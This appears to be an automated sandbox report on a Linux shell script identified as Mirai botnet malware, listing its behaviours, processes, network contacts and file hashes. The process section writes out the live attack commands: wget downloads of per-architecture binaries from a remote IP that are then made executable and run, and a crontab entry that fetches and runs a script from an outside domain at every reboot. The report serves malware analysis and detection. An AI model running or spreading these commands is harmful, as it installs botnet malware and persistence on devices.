Analysis Overview
SHA256
7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
Threat Level: Known bad
The file l.sh was found to be: Known bad.
Malicious Activity Summary
Mirai family
Mirai
Unexpected DNS network traffic destination
File and Directory Permissions Modification
Renames itself
Executes dropped EXE
Creates/modifies Cron job
Enumerates running processes
Changes its process name
Reads runtime system information
Writes file to tmp directory
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 08:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 08:41
Reported
2024-11-09 08:43
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
138s
Max time network
146s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/lib/dvrLocker | N/A |
| N/A | N/A | /mnt/dvrLocker | N/A |
| N/A | N/A | /mnt/dvrLocker | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 5.161.109.23 | N/A | N/A |
| Destination IP | 202.61.197.122 | N/A | N/A |
| Destination IP | 64.176.6.48 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.kwgToV | /usr/bin/crontab | N/A |
| File opened for modification | /var/spool/cron/crontabs/tmp.jeG6xK | /usr/bin/crontab | N/A |
| File opened for modification | /var/spool/cron/crontabs/tmp.k7lYiR | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | [kswapd0] | /tmp/lib/dvrLocker | N/A |
| Changes the process name, possibly in an attempt to hide itself | mini_httpd | /mnt/dvrLocker | N/A |
| Changes the process name, possibly in an attempt to hide itself | [kswapd0] | /mnt/dvrLocker | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/lib/dvrLocker | /tmp/l.sh | N/A |
Processes
/tmp/l.sh
[/tmp/l.sh]
/bin/ls
[ls -l /proc/1/exe]
/bin/ls
[ls -l /proc/10/exe]
/bin/ls
[ls -l /proc/1017/exe]
/bin/ls
[ls -l /proc/1022/exe]
/bin/ls
[ls -l /proc/1036/exe]
/bin/ls
[ls -l /proc/1042/exe]
/bin/ls
[ls -l /proc/1056/exe]
/bin/ls
[ls -l /proc/1060/exe]
/bin/ls
[ls -l /proc/1063/exe]
/bin/ls
[ls -l /proc/1066/exe]
/bin/ls
[ls -l /proc/1070/exe]
/bin/ls
[ls -l /proc/1080/exe]
/bin/ls
[ls -l /proc/1084/exe]
/bin/ls
[ls -l /proc/1093/exe]
/bin/ls
[ls -l /proc/11/exe]
/bin/ls
[ls -l /proc/1108/exe]
/bin/ls
[ls -l /proc/1113/exe]
/bin/ls
[ls -l /proc/1117/exe]
/bin/ls
[ls -l /proc/1121/exe]
/bin/ls
[ls -l /proc/1125/exe]
/bin/ls
[ls -l /proc/1129/exe]
/bin/ls
[ls -l /proc/1133/exe]
/bin/ls
[ls -l /proc/1138/exe]
/bin/ls
[ls -l /proc/1142/exe]
/bin/ls
[ls -l /proc/1143/exe]
/bin/ls
[ls -l /proc/1146/exe]
/bin/ls
[ls -l /proc/1149/exe]
/bin/ls
[ls -l /proc/115/exe]
/bin/ls
[ls -l /proc/1151/exe]
/bin/ls
[ls -l /proc/1161/exe]
/bin/ls
[ls -l /proc/1163/exe]
/bin/ls
[ls -l /proc/1165/exe]
/bin/ls
[ls -l /proc/1166/exe]
/bin/ls
[ls -l /proc/1171/exe]
/bin/ls
[ls -l /proc/1179/exe]
/bin/ls
[ls -l /proc/1182/exe]
/bin/ls
[ls -l /proc/1183/exe]
/bin/ls
[ls -l /proc/1184/exe]
/bin/ls
[ls -l /proc/1185/exe]
/bin/ls
[ls -l /proc/1188/exe]
/bin/ls
[ls -l /proc/1191/exe]
/bin/ls
[ls -l /proc/12/exe]
/bin/ls
[ls -l /proc/1226/exe]
/bin/ls
[ls -l /proc/1228/exe]
/bin/ls
[ls -l /proc/1255/exe]
/bin/ls
[ls -l /proc/1256/exe]
/bin/ls
[ls -l /proc/1269/exe]
/bin/ls
[ls -l /proc/1282/exe]
/bin/ls
[ls -l /proc/1287/exe]
/bin/ls
[ls -l /proc/1297/exe]
/bin/ls
[ls -l /proc/13/exe]
/bin/ls
[ls -l /proc/1308/exe]
/bin/ls
[ls -l /proc/1313/exe]
/bin/ls
[ls -l /proc/1317/exe]
/bin/ls
[ls -l /proc/1339/exe]
/bin/ls
[ls -l /proc/1349/exe]
/bin/ls
[ls -l /proc/137/exe]
/bin/ls
[ls -l /proc/1379/exe]
/bin/ls
[ls -l /proc/14/exe]
/bin/ls
[ls -l /proc/1478/exe]
/bin/ls
[ls -l /proc/1497/exe]
/bin/ls
[ls -l /proc/15/exe]
/bin/ls
[ls -l /proc/1503/exe]
/bin/ls
[ls -l /proc/1505/exe]
/bin/ls
[ls -l /proc/1506/exe]
/bin/ls
[ls -l /proc/1507/exe]
/bin/ls
[ls -l /proc/1509/exe]
/bin/ls
[ls -l /proc/159/exe]
/bin/ls
[ls -l /proc/16/exe]
/bin/ls
[ls -l /proc/160/exe]
/bin/ls
[ls -l /proc/161/exe]
/bin/ls
[ls -l /proc/162/exe]
/bin/ls
[ls -l /proc/163/exe]
/bin/ls
[ls -l /proc/164/exe]
/bin/ls
[ls -l /proc/165/exe]
/bin/ls
[ls -l /proc/166/exe]
/bin/ls
[ls -l /proc/167/exe]
/bin/ls
[ls -l /proc/168/exe]
/bin/ls
[ls -l /proc/169/exe]
/bin/ls
[ls -l /proc/17/exe]
/bin/ls
[ls -l /proc/170/exe]
/bin/ls
[ls -l /proc/171/exe]
/bin/ls
[ls -l /proc/172/exe]
/bin/ls
[ls -l /proc/173/exe]
/bin/ls
[ls -l /proc/174/exe]
/bin/ls
[ls -l /proc/175/exe]
/bin/ls
[ls -l /proc/176/exe]
/bin/ls
[ls -l /proc/178/exe]
/bin/ls
[ls -l /proc/18/exe]
/bin/ls
[ls -l /proc/19/exe]
/bin/ls
[ls -l /proc/2/exe]
/bin/ls
[ls -l /proc/20/exe]
/bin/ls
[ls -l /proc/203/exe]
/bin/ls
[ls -l /proc/204/exe]
/bin/ls
[ls -l /proc/21/exe]
/bin/ls
[ls -l /proc/22/exe]
/bin/ls
[ls -l /proc/23/exe]
/bin/ls
[ls -l /proc/24/exe]
/bin/ls
[ls -l /proc/244/exe]
/bin/ls
[ls -l /proc/25/exe]
/bin/ls
[ls -l /proc/26/exe]
/bin/ls
[ls -l /proc/269/exe]
/bin/ls
[ls -l /proc/27/exe]
/bin/ls
[ls -l /proc/28/exe]
/bin/ls
[ls -l /proc/29/exe]
/bin/ls
[ls -l /proc/3/exe]
/bin/ls
[ls -l /proc/30/exe]
/bin/ls
[ls -l /proc/309/exe]
/bin/ls
[ls -l /proc/31/exe]
/bin/ls
[ls -l /proc/313/exe]
/bin/ls
[ls -l /proc/32/exe]
/bin/ls
[ls -l /proc/34/exe]
/bin/ls
[ls -l /proc/35/exe]
/bin/ls
[ls -l /proc/36/exe]
/bin/ls
[ls -l /proc/4/exe]
/bin/ls
[ls -l /proc/405/exe]
/bin/ls
[ls -l /proc/412/exe]
/bin/ls
[ls -l /proc/436/exe]
/bin/ls
[ls -l /proc/443/exe]
/bin/ls
[ls -l /proc/454/exe]
/bin/ls
[ls -l /proc/457/exe]
/bin/ls
[ls -l /proc/463/exe]
/bin/ls
[ls -l /proc/466/exe]
/bin/ls
[ls -l /proc/472/exe]
/bin/ls
[ls -l /proc/473/exe]
/bin/ls
[ls -l /proc/474/exe]
/bin/ls
[ls -l /proc/476/exe]
/bin/ls
[ls -l /proc/480/exe]
/bin/ls
[ls -l /proc/484/exe]
/bin/ls
[ls -l /proc/485/exe]
/bin/ls
[ls -l /proc/487/exe]
/bin/ls
[ls -l /proc/5/exe]
/bin/ls
[ls -l /proc/516/exe]
/bin/ls
[ls -l /proc/523/exe]
/bin/ls
[ls -l /proc/535/exe]
/bin/ls
[ls -l /proc/542/exe]
/bin/ls
[ls -l /proc/552/exe]
/bin/ls
[ls -l /proc/573/exe]
/bin/ls
[ls -l /proc/597/exe]
/bin/ls
[ls -l /proc/598/exe]
/bin/ls
[ls -l /proc/6/exe]
/bin/ls
[ls -l /proc/634/exe]
/bin/ls
[ls -l /proc/648/exe]
/bin/ls
[ls -l /proc/649/exe]
/bin/ls
[ls -l /proc/651/exe]
/bin/ls
[ls -l /proc/658/exe]
/bin/ls
[ls -l /proc/670/exe]
/bin/ls
[ls -l /proc/697/exe]
/bin/ls
[ls -l /proc/7/exe]
/bin/ls
[ls -l /proc/744/exe]
/bin/ls
[ls -l /proc/757/exe]
/bin/ls
[ls -l /proc/78/exe]
/bin/ls
[ls -l /proc/79/exe]
/bin/ls
[ls -l /proc/8/exe]
/bin/ls
[ls -l /proc/80/exe]
/bin/ls
[ls -l /proc/81/exe]
/bin/ls
[ls -l /proc/82/exe]
/bin/ls
[ls -l /proc/83/exe]
/bin/ls
[ls -l /proc/84/exe]
/bin/ls
[ls -l /proc/85/exe]
/bin/ls
[ls -l /proc/89/exe]
/bin/ls
[ls -l /proc/895/exe]
/bin/ls
[ls -l /proc/9/exe]
/bin/ls
[ls -l /proc/949/exe]
/bin/ls
[ls -l /proc/950/exe]
/bin/ls
[ls -l /proc/98/exe]
/bin/ls
[ls -l /proc/985/exe]
/bin/ls
[ls -l /proc/990/exe]
/bin/ls
[ls -l /proc/993/exe]
/bin/rm
[rm -rf /tmp/lib/]
/bin/rm
[rm -rf /tmp/lib/dvrLocker]
/bin/mkdir
[mkdir /tmp/lib/]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf x86]
/bin/rm
[rm -rf /mnt/dvrLocker]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf x86]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf x86]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.129.91:443 | tcp | |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| GB | 89.187.167.38:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| US | 5.161.109.23:53 | kingstonwikkerink.dyn | udp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| CL | 64.176.6.48:53 | kingstonwikkerink.dyn | udp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| DE | 202.61.197.122:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:14781 | kingstonwikkerink.dyn | tcp |
| CN | 43.226.79.41:62371 | udp |
Files
/tmp/lib/dvrLocker
| MD5 | 4ad582d49f505bfab7de84881998685b |
| SHA1 | 5f09f4baed114b594729ded91e2c4d263f0e2754 |
| SHA256 | b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1 |
| SHA512 | 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4 |
/tmp/lib/dvrLocker
| MD5 | 559f129d380ad1cfb60792c6b2dc3d32 |
| SHA1 | 3997a0fc0bd5958783f1751364ec407c5b170adc |
| SHA256 | fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d |
| SHA512 | 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112 |
/tmp/lib/dvrLocker
| MD5 | d09db60a70d5b53b5b53ad39476fd7e8 |
| SHA1 | 73a75e5e8200f77d857a7256cc0979077e29241d |
| SHA256 | 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165 |
| SHA512 | ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04 |
/tmp/lib/dvrLocker
| MD5 | f812a7b3a877f717eb6e54b843b41848 |
| SHA1 | 21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25 |
| SHA256 | 9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560 |
| SHA512 | c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732 |
/tmp/lib/dvrLocker
| MD5 | a016f79253a036ed87dd3ae118767cf2 |
| SHA1 | 52c10912a82115af3a6dca21993c223a6e7c669d |
| SHA256 | 95f180a725b479687bdb9818991a68be75f0ba901c969cc93746e9996c1d0e50 |
| SHA512 | 516191548c77eca021d07886a811f2fa6fc4be4f0321d5d61c1452cb22606877349a2dc80b03725f6e18fc0ce2524b0040baa6bdbabb40e9342da4401aa6e509 |
/tmp/lib/dvrLocker
| MD5 | 78c772ea162b97132c3b76f6c313d326 |
| SHA1 | d45f7fc473e9e47185541bff467721386245e8e6 |
| SHA256 | a621a97a08419ab7d35eecb70ae4a9f8849f621101821ca84df3886252ace701 |
| SHA512 | fde9dc70c6cc6fa518a81cf52fe4bcba66c54afeb8986644dfa700bc1c9766f3d51160ebc7b2eb98c50c99a26b3caea541783b59d1bb208d8746f96121a70a00 |
/var/spool/cron/crontabs/tmp.jeG6xK
| MD5 | 50615ad6e26d96511b53202a444c5adf |
| SHA1 | 5bd5689ac12e87808368ca533ac37de5e87a5572 |
| SHA256 | 9d9de6a1533d670579c5ef30d6ec10792da69ea28cf2db0589549668ee5b5e5b |
| SHA512 | 815b123082890500949a2d90d67e9d202f02a03b112aedb71ca28efcf92d6e28b8ce49034f3111cf8e5eeb3296f381911be3835538f3928ead826af632400741 |
/mnt/dvrLocker
| MD5 | b1a1559b205459098f1fff627d35c808 |
| SHA1 | 983f62052375084a8c125353e0c25b7cd19bd369 |
| SHA256 | e4837942ba2584de61bc3a75eba74f4eb0a137a7807130553c42d470c3ec01da |
| SHA512 | 3bb8ec38b6f3d17f7c7307785f609031b30056da380377bce27bdd48678cbbc81c4b7203ff511794ec6d23644952a82fa471e13149c014a91378f08305e6f60d |
/var/spool/cron/crontabs/tmp.k7lYiR
| MD5 | 9ed1c2ba0b84e3f738ead207c7035a35 |
| SHA1 | 493f92e391ccf01c25c53e11a1b793240e79f5f6 |
| SHA256 | 04195b12cd1400e8252bead74661e3384632a0bbcea5d8c52f8e0635bdc3919d |
| SHA512 | 705d28611e2f551e51df9e60b99c189244c4798674b9d114fbf3072a30418c8783bd1a7ee0991439e8b02ec9480d3848840299151bb2b86f328a7c08a08e12bc |
/var/spool/cron/crontabs/tmp.kwgToV
| MD5 | fa18d8ddc32b949074f8e5955ee746e0 |
| SHA1 | 66bf6733f867d38bf1506f2fcf730444c6eacee2 |
| SHA256 | 52c9e4b1a2d1ca0b4de5f5f4cce9aa98ec17b37a49ed2fc1842bb78937765dc9 |
| SHA512 | a6a8017f1050d8f03eea7cf66522c39d64661c4d44c1642317c8ebf20d20c7d8e9f47e45bf01d512323195150cbee0dc3dd8da4bf90735b273a64eddaebc85ac |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 08:41
Reported
2024-11-09 08:43
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
